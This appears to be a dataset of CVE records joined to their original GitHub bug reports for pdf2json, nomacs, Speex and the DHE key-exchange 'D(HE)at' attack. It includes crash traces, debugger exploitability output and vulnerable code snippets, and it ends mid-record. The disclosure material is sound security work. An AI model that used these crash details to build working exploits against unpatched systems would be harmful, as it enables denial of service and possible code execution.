cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2020-23879
2021-11-10T22:15:09.783
pdf2json v0.71 was discovered to contain a NULL pointer dereference in the component ObjectStream::getObject.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2json" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/44" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2json" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/44" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.71:*:*:*:*:*:*:*", "matchCriteriaId": "04335321-68D4-408C-A751-7CBE39D6F9FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/flexpaper/pdf2json/issues/44
[ "Exploit", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
$ ./pdf2json 00-NULL-pointer-dereference-ObjectStream-getObject.pdf Error (1853): Dictionary key must be a name object Error (1860): Dictionary key must be a name object ASAN:SIGSEGV ================================================================= ==88712==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000432f60 bp 0x7ffe1f9cf650 sp 0x7ffe1f9cf5b8 T0) #0 0x432f5f in ObjectStream::getObject(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:183 #1 0x4345ec in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:841 #2 0x411283 in Object::dictLookup(char*, Object*) /home/test/pdf2json_tmp/xpdf/Object.h:253 #3 0x411283 in Catalog::Catalog(XRef*) /home/test/pdf2json_tmp/xpdf/Catalog.cc:51 #4 0x427fe0 in PDFDoc::setup(GString*, GString*) /home/test/pdf2json_tmp/xpdf/PDFDoc.cc:201 #5 0x42815b in PDFDoc::PDFDoc(GString*, GString*, GString*, void*) /home/test/pdf2json_tmp/xpdf/PDFDoc.cc:101 #6 0x402856 in main /home/test/pdf2json_tmp/src/pdf2json.cc:159 #7 0x7fd2eaec383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #8 0x403788 in _start (/home/test/pdf2json_tmp/src/pdf2json+0x403788) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/test/pdf2json_tmp/xpdf/XRef.cc:183 ObjectStream::getObject(int, int, Object*) ==88712==ABORTING ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2json [00-NULL-pointer-dereference-ObjectStream-getObject.pdf](https://github.com/flexpaper/pdf2json/files/4895900/00-NULL-pointer-dereference-ObjectStream-getObject.pdf)
NULL-pointer-dereference-ObjectStream-getObject
https://api.github.com/repos/flexpaper/pdf2json/issues/44/comments
0
2020-07-09T09:51:29Z
2020-07-09T09:51:29Z
https://github.com/flexpaper/pdf2json/issues/44
653,926,508
44
2,778
CVE-2020-23884
2021-11-10T22:15:09.873
A buffer overflow in Nomacs v3.15.0 allows attackers to cause a denial of service (DoS) via a crafted MNG file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://github.com/Aurorainfinity/vulnerabilities/blob/master/nomacs/readme.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nomacs/nomacs/issues/516" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://nomacs.org/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/Aurorainfinity/vulnerabilities/blob/master/nomacs/readme.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nomacs/nomacs/issues/516" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://nomacs.org/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nomacs:nomacs:3.15.0:*:*:*:*:*:*:*", "matchCriteriaId": "AB514AA7-1C7F-4BEF-9F0B-051493D56EAB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/nomacs/nomacs/issues/516
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nomacs", "nomacs" ]
Two issues were found in nomacs in all versions. nomacs does not handle the mng file format very well. When nomacs opens a carefully constructed mng file, nomacs will have a buffer overflow and crash # 1. buffer overflow ++++++++++++++++++++++++++++++++++++++++++++ (71c.f7c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=3ffffc38 edx=045d0000 esi=0425fd80 edi=205d1000 eip=6edc103b esp=03a7f130 ebp=00000000 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\test\Desktop\nomacs-2.4.6-x86-WinXP\imageformats\qmng4.dll - qmng4+0x2103b: 6edc103b f3ab rep stos dword ptr es:[edi] 0:011> !exploitable -v !exploitable 1.6.0.0 HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x205d1000 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Write Access Violation Faulting Instruction:6edc103b rep stos dword ptr es:[edi] Exception Hash (Major/Minor): 0x8c7435c8.0xf37f4977 Hash Usage : Stack Trace: Major+Minor : qmng4+0x2103b Instruction Address: 0x000000006edc103b Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at qmng4+0x000000000002103b (Hash=0x8c7435c8.0xf37f4977) User mode write access violations that are not near NULL are exploitable. ++++++++++++++++++++++++++++++++++++++++++++ # 2. memory corruption ************************************************************************* (340.62c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0459e8e1 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000000 eip=6edbd435 esp=03aef3c4 ebp=04592a58 iopl=0 nv up ei ng nz na po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010283 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\test\Desktop\nomacs-2.4.6-x86-WinXP\imageformats\qmng4.dll - qmng4+0x1d435: 6edbd435 880e mov byte ptr [esi],cl ds:0023:00000000=?? 0:009> !exploitable -v !exploitable 1.6.0.0 HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x0 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Write Access Violation Faulting Instruction:6edbd435 mov byte ptr [esi],cl Basic Block: 6edbd435 mov byte ptr [esi],cl Tainted Input operands: 'cl','esi' 6edbd437 movzx ecx,byte ptr [eax] 6edbd43a mov byte ptr [esi+1],cl 6edbd43d movzx ecx,byte ptr [eax-1] 6edbd441 mov byte ptr [esi+2],cl 6edbd444 movzx ecx,byte ptr [eax+2] 6edbd448 mov byte ptr [esi+3],cl 6edbd44b mov ecx,dword ptr [ebp+248h] 6edbd451 add edx,ecx 6edbd453 add eax,4 6edbd456 lea esi,[esi+ecx*4] 6edbd459 cmp edx,dword ptr [ebp+294h] 6edbd45f jl qmng4+0x1d431 (6edbd431) Exception Hash (Major/Minor): 0xebb32a1e.0x41bed88a Hash Usage : Stack Trace: Major+Minor : qmng4+0x1d435 Major+Minor : qmng4+0x106d Instruction Address: 0x000000006edbd435 Description: User Mode Write AV near NULL Short Description: WriteAVNearNull Exploitability Classification: UNKNOWN Recommended Bug Title: User Mode Write AV near NULL starting at qmng4+0x000000000001d435 (Hash=0xebb32a1e.0x41bed88a) User mode write access violations that are near NULL are unknown. *************************************************************************
Open a malformed mng format file, buffer overflow and memory corruption will occur.
https://api.github.com/repos/nomacs/nomacs/issues/516/comments
8
2020-07-09T11:28:59Z
2023-09-12T16:23:11Z
https://github.com/nomacs/nomacs/issues/516
653,986,822
516
2,779
CVE-2020-23903
2021-11-10T22:15:11.563
A Divide by Zero vulnerability in the function static int read_samples of Speex v1.2 allows attackers to cause a denial of service (DoS) via a crafted WAV file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/xiph/speex/issues/13" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LXCRAYNW5ESCE2PIGTUXZNZHNYFLJ6PX/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3SEV2ZRR47GSD3M7O5PH4XEJMKJJNG2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/xiph/speex/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LXCRAYNW5ESCE2PIGTUXZNZHNYFLJ6PX/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3SEV2ZRR47GSD3M7O5PH4XEJMKJJNG2/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xiph:speex:1.2:-:*:*:*:*:*:*", "matchCriteriaId": "A022C12C-6581-4217-AE2D-FEDA32F1E5EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "369" ]
369
https://github.com/xiph/speex/issues/13
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "xiph", "speex" ]
when speexenc encode wav file , deal with channels 0 will generate a Division by zero error which will cause the software crash [sample.tar.gz](https://github.com/xiph/speex/files/4910664/sample.tar.gz) usage : speexenc sample - vulnerability function: static int read_samples(FILE *fin,int frame_size, int bits, int channels, int lsb, short * input, char *buff, spx_int32_t *size) { unsigned char in[MAX_FRAME_BYTES*2]; int i; short *s; int nb_read; size_t to_read; if (size && *size<=0) { return 0; } to_read = bits/8*channels*frame_size;
speexenc encode wav file dos vulnerability
https://api.github.com/repos/xiph/speex/issues/13/comments
2
2020-07-13T04:52:03Z
2022-02-11T21:46:30Z
https://github.com/xiph/speex/issues/13
655,578,739
13
2,780
CVE-2020-23904
2021-11-10T22:15:11.663
A stack buffer overflow in speexenc.c of Speex v1.2 allows attackers to cause a denial of service (DoS) via a crafted WAV file. NOTE: the vendor states "I cannot reproduce it" and it "is a demo program.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiph/speex/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiph/speex/issues/14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xiph:speex:1.2:-:*:*:*:*:*:*", "matchCriteriaId": "A022C12C-6581-4217-AE2D-FEDA32F1E5EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/xiph/speex/issues/14
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xiph", "speex" ]
I have found a stack buffer overflow vulnerability in speexenc,this may cause a rce by open a crafted wav file [sample2.zip](https://github.com/xiph/speex/files/4916306/sample2.zip) the vulnerability function: speexenc.c:122 } else { nb_read = fread(in,1,to_read,fin);
speexenc stack buffer overflow
https://api.github.com/repos/xiph/speex/issues/14/comments
5
2020-07-14T03:07:21Z
2022-01-13T21:43:24Z
https://github.com/xiph/speex/issues/14
656,288,229
14
2,781
CVE-2002-20001
2021-11-11T19:15:07.380
The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)at or D(HE)ater attack. The client needs very little CPU resources and network bandwidth. The attack may be more disruptive in cases where a client can require a server to select its largest supported key size. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-506569.pdf" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://dheatattack.com" }, { "source": "cve@mitre.org", "tags": null, "url": "https://dheatattack.gitlab.io/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/Balasys/dheater" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/mozilla/ssl-config-generator/issues/162" }, { "source": "cve@mitre.org", "tags": null, "url": "https://gitlab.com/dheatattack/dheater" }, { "source": "cve@mitre.org", "tags": null, "url": "https://ieeexplore.ieee.org/document/10374117" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://support.f5.com/csp/article/K83120834" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-004.txt" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.openssl.org/blog/blog/2022/10/21/tls-groups-configuration/" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://www.reddit.com/r/netsec/comments/qdoosy/server_overload_by_enforcing_dhe_key_exchange/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Technical Description" ], "url": "https://www.researchgate.net/profile/Anton-Stiglic-2/publication/2401745_Security_Issues_in_the_Diffie-Hellman_Key_Agreement_Protocol" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.suse.com/support/kb/doc/?id=000020510" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-506569.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://dheatattack.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://dheatattack.gitlab.io/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/Balasys/dheater" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/mozilla/ssl-config-generator/issues/162" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://gitlab.com/dheatattack/dheater" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://ieeexplore.ieee.org/document/10374117" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.f5.com/csp/article/K83120834" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-004.txt" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.openssl.org/blog/blog/2022/10/21/tls-groups-configuration/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://www.reddit.com/r/netsec/comments/qdoosy/server_overload_by_enforcing_dhe_key_exchange/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description" ], "url": "https://www.researchgate.net/profile/Anton-Stiglic-2/publication/2401745_Security_Issues_in_the_Diffie-Hellman_Key_Agreement_Protocol" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.suse.com/support/kb/doc/?id=000020510" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:balasys:dheater:-:*:*:*:*:*:*:*", "matchCriteriaId": "DE3F88FC-F039-433B-9035-88F1691DA082", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:scalance_w1750d_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "065280B2-6EC1-4721-B3D7-EDE44ED4F5BD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:scalance_w1750d:-:*:*:*:*:*:*:*", "matchCriteriaId": "FBC30055-239F-4BB1-B2D1-E5E35F0D8911", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:suse:linux_enterprise_server:11:-:*:*:*:*:*:*", "matchCriteriaId": "F13F07CC-739B-465C-9184-0E9D708BD4C7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:suse:linux_enterprise_server:12:-:*:*:*:*:*:*", "matchCriteriaId": "15FC9014-BD85-4382-9D04-C0703E901D7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:suse:linux_enterprise_server:15:*:*:*:*:*:*:*", "matchCriteriaId": "70A029CD-2AC4-4877-B1A4-5C72B351BA27", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "CE73DAA2-9CCA-4BD6-B11A-9326F79D9ABB", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "475E283C-8F3C-4051-B9E8-349845F8C528", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*", "matchCriteriaId": "956AC9F3-2042-4C21-A5E4-D2D4334D2FC3", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "E17DBD3E-F5AC-4A35-81E0-C4804CAD78F9", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "346B71B1-D583-4463-ADF8-BEE700B0CA3A", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B2AA25BA-72C5-48A9-BDBC-CA108208011F", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_application_visibility_and_reporting:*:*:*:*:*:*:*:*", "matchCriteriaId": "308B0070-6716-4754-A5E4-C3D70CAB376B", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*", "matchCriteriaId": "8F26AB06-7FEB-4A56-B722-DBDEEE628DB8", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_ddos_hybrid_defender:*:*:*:*:*:*:*:*", "matchCriteriaId": "EE48C9C9-6B84-4A4A-963D-6DFE0C2FB312", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*", "matchCriteriaId": "878CD8E6-6B9B-431D-BD15-F954C7B8076F", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*", "matchCriteriaId": "4D9DB9B9-2959-448E-9B59-C873584A0E11", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*", "matchCriteriaId": "6AF04191-019B-4BC9-A9A7-7B7AA9B5B7D1", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", 